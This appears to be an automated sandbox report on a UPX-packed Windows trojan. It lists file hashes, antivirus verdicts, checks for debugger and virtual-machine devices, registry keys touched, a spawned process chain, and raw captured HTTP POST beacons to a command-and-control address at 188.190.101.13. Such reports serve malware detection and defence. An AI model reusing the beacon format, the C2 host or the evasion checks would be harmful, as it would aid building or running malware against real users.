Flattr this analysis!

Tags: None

Analysis

Category Started Completed Duration
FILE 2013-11-28 11:37:10 2013-11-28 11:39:31 141 seconds

File Details

File Name FT211c.exe
File Size 51200 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5 4fa91b76294d849d01655ffb72b30981
SHA1 1220d6576bca4a9d49b913a134ea01da04dc2934
SHA256 592bb53f45d49e1002a0bb98b533111bc3edb1421564982977a4be4053137d2a
SHA512 6d24a6aafe90173f84fa441231b42eb97511aeae01da07a446cb7368018d522b41e953cf2544f2adc32119f48fc8be6c862b578cc1d9d60d05527b4e238ea34f
CRC32 59452FB4
Ssdeep 768:lvwhFHWNBv4XkwnSRl77tBEvPs91xyTS/rydsJwFlTKElMfGEl8XBl8Ori3f:lohYv4UwnSR1BnxyO/rydgwjFJBeh
Yara None matched
You need to login

Signatures

File has been identified by at least one AntiVirus on VirusTotal as malicious
Performs some HTTP requests
The executable is compressed using UPX
section: {u'size_of_data': u'0x00000000', u'virtual_address': u'0x00001000', u'entropy': 0.0, u'name': u'UPX0', u'virtual_size': u'0x0000c000'}
Checks for the presence of known devices from debuggers and forensic tools

Screenshots


Hosts

IP
188.190.101.13

Domains

No domains contacted.


Summary

SICE
SIWVID
NTICE
TRW
TWX
ICEEXT
SYSER
IDE#CdRomVBOX_CD-ROM_____________________________1.0_____#42562d3231303037333036372020202020202020#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
MountPointManager
STORAGE#Volume#1&30a96598&0&Signature32B832B7Offset7E00Length27F4DB200#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
C:\Program Files
index.htm
c:\
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\BagMRU
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\FT211c.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{475c7950-e3d2-11e0-8d7a-806d6172696f}\
HKEY_CLASSES_ROOT\Directory
HKEY_CLASSES_ROOT\Directory\CurVer
HKEY_CLASSES_ROOT\Directory\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{475c7950-e3d2-11e0-8d7a-806d6172696f}\\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CLASSES_ROOT\Directory\\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Directory\\Clsid
HKEY_CLASSES_ROOT\Folder
HKEY_CLASSES_ROOT\Folder\Clsid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\.htm
HKEY_CLASSES_ROOT\.htm
HKEY_CLASSES_ROOT\htmlfile
HKEY_CLASSES_ROOT\htmlfile\CurVer
HKEY_CLASSES_ROOT\htmlfile\
HKEY_CLASSES_ROOT\htmlfile\opennew
DBWinMutex
CTF.TimListCache.FMPDefaultS-1-5-21-1547161642-507921405-839522115-1004MUTEX.DefaultS-1-5-21-1547161642-507921405-839522115-1004

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
UPX0 0x00001000 0x0000c000 0x00000000 0.0
UPX1 0x0000d000 0x0000d000 0x0000c200 7.95842977912
.rsrc 0x0001a000 0x00001000 0x00000400 2.93055497499

Imports

Library KERNEL32.DLL:
0xc9a1ac LoadLibraryA
0xc9a1b0 GetProcAddress
0xc9a1b4 VirtualProtect
0xc9a1b8 VirtualAlloc
0xc9a1bc VirtualFree
0xc9a1c0 ExitProcess
Library advapi32.dll:
0xc9a1c8 RegOpenKeyA
Library oleaut32.dll:
0xc9a1d0 SysFreeString
Library PSAPI.dll:
Library shell32.dll:
0xc9a1e0 SHGetMalloc
Library user32.dll:
0xc9a1e8 CharNextW

This program must be run under Win32
)iVjg_
_o *73
7L!aY$
<+5oc
Zv"{DR
E[V$?!
pZdpXA=
1U?OgBk
1kT C!
=Q|Q"6;G
,Z5h?0
Q`Thf:K
)"+.u'
GX,3Z!Ac
Qd8=kw^
AnZ\G`'
D9yPx
71@ g|G
`wX{/ +!
}Cq< X
l{!JCS
ejPyghI
RU6wFI
4v>2}B
x>C3|4
@GbG/k
/,p2~<
^1xQ0/
k}@f}6
N[S_J
j@3X@%d(
;YU3^J
z>5mo\L
&$X4Na
j{cwr,
<$2(-!@
:-.\O2
3^8bzdz
D.Tpr}
Esf,9#
B<N u~T
AKWz?c
HT0P|cn<
_t [0So
w 4N;
+9./i^
K3xc1C
n7CIQn
#J(MT>1
u2S_~kq
"lZO+f
-](wo6
:#-^}s
D$FHX<i
~&|cdm3$t
v;Wha]~
h.,NbF
67.,kl~y
o{96HP-
90Fw<s
wCGsFx
RtBXit
Z?|;dp+Q
2*(6<^o
o(CDwQ
gNd\g(^[
3Cuv.M
ApUQ*kN)Y
1lJ|.^!
[hm70K'
dCeyA
Y`Ft.`
[SYXIi0
?XJeN4u{
2N<H0i
~ XTp~
=#egBP
ye"x#?
@z<6$^
,g)pJ/
TTv0zx
(,w5kaD
3'>e|'
a7GkT\
o;OU`n
p?$Kbj
tt;QC
F3ByIc
t$t#t$l
D$t#D$h
D$t+D$\
.)D$H+
s`)L$4
D$t+D$\
)D$H)
9l$\w_
XPTPSW
KERNEL32.DLL
advapi32.dll
oleaut32.dll
PSAPI.dll
shell32.dll
user32.dll
LoadLibraryA
GetProcAddress
VirtualProtect
VirtualAlloc
VirtualFree
ExitProcess
RegOpenKeyA
SysFreeString
GetModuleFileNameExW
SHGetMalloc
CharNextW
Antivirus Signature
Bkav Clean
MicroWorld-eScan Gen:Variant.Barys.2752
nProtect Clean
CAT-QuickHeal Clean
McAfee Artemis!4FA91B76294D
Malwarebytes Clean
TheHacker Posible_Worm32
K7GW Trojan ( 0048e7511 )
K7AntiVirus Trojan ( 0048e7511 )
NANO-Antivirus Clean
F-Prot Clean
Symantec Trojan.Gen.2
Norman Troj_Generic.RAFTQ
TotalDefense Clean
TrendMicro-HouseCall TROJ_GEN.F47V1110
Avast Win32:DelfInject [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender Gen:Variant.Barys.2752
Agnitum Clean
SUPERAntiSpyware Clean
ByteHero Clean
Emsisoft Gen:Variant.Barys.2752 (B)
Comodo TrojWare.Win32.Injector.FR
F-Secure Gen:Variant.Barys.2752
DrWeb Clean
VIPRE Trojan.Win32.Injector.ikp (v)
AntiVir TR/Crypt.ULPM.Gen
TrendMicro PAK_Generic.001
McAfee-GW-Edition Heuristic.BehavesLike.Win32.ModifiedUPX.C
Sophos Mal/Generic-S
Jiangmin Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft VirTool:Win32/DelfInject.gen!CP
ViRobot Clean
GData Gen:Variant.Barys.2752
Commtouch W32/Trojan.XBYP-5411
AhnLab-V3 Clean
VBA32 SScope.Trojan.MBRLock.2121
Baidu-International Trojan.Win32.Generic.AvUI
ESET-NOD32 Win32/Delf.ACC
Rising Suspicious
Ikarus Trojan.Win32.Spy
Fortinet W32/Delf.ACC
AVG Delf.ANDS
Panda Trj/CI.A

  • FT211c.exe 1088
    • certlogtwain.exe 1952
      • iexplore.exe 1944
FT211c.exe, PID: 1088, Parent PID: 1824

network filesystem registry process services synchronization

certlogtwain.exe, PID: 1952, Parent PID: 1088

network filesystem registry process services synchronization

iexplore.exe, PID: 1944, Parent PID: 1952

network filesystem registry process services synchronization

Domains

No domains contacted.

Hosts

IP
188.190.101.13

HTTP Requests

URI Data
http://188.190.101.13/hor/input.php
POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://mhome.br
Content-Length: 106
Content-Type: application/x-www-form-urlencoded

m=CA==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=&p=cHd1fQ==&v=ChYJCRhta3k=&s=DRhAAA4YeRgIXBgIUBgPVRgKAEs=
http://188.190.101.13/hor/input.php
POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://udot.tk
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

m=CQ==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=
http://188.190.101.13/hor/input.php
POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://www.gano.at
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

m=CQ==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=

IRC Traffic

No IRC traffic.

SMTP Requests

No SMTP requests performed.

Sorry! No dropped files.
Bummer! No comments yet.

You have to login to comment.